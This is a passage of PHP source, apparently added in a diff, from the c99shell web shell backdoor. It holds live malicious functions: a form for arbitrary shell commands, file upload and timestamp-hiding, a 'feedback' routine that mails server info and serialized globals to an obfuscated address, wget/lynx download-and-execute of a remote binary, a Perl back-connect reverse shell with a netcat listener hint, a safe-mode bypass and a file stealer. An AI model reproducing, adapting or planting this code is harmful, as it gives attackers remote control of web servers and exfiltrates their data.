rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." 
<br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! 
Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act 
value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." 
objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" 
checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form 
enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. 
For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+ elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + 
$tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + 
$row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." 
folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" 
selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + + + + + + + ?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57 </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"> + </div> + <form action="<?php echo $surl; ?>"> +<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form> + </td> + <td width="50%" height="83" valign="top"><center> + <center> + + + <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form> +Click "Connect" only after open port for it. 
You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> + + </center> + </td> +</tr></TABLE> + + + + + + + +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><b>Safe_Mode Bypass</b> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + <textarea name="erorr" cols=100 rows=10></textarea></br> + <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84> + <input type="submit" value="Write 2 File !!"> + + </form> + + + + + + + + + + + + </div> + + </td> + <td width="50%" height="83" valign="top"><center> + <center> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500 value=""><br><br> +Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> +<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> +</form> +<br><br><br> + + + + + </center> + + </center> + </td> +</tr></TABLE> + + + + + + + + + + + + +<?php + +if (isset($_POST['dosyaa'])) +{ +dosyayicek($_POST['dosyaa'],$_POST['yeniyer']); + +} +if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); +echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." 
...</b>"; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... 
"; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" 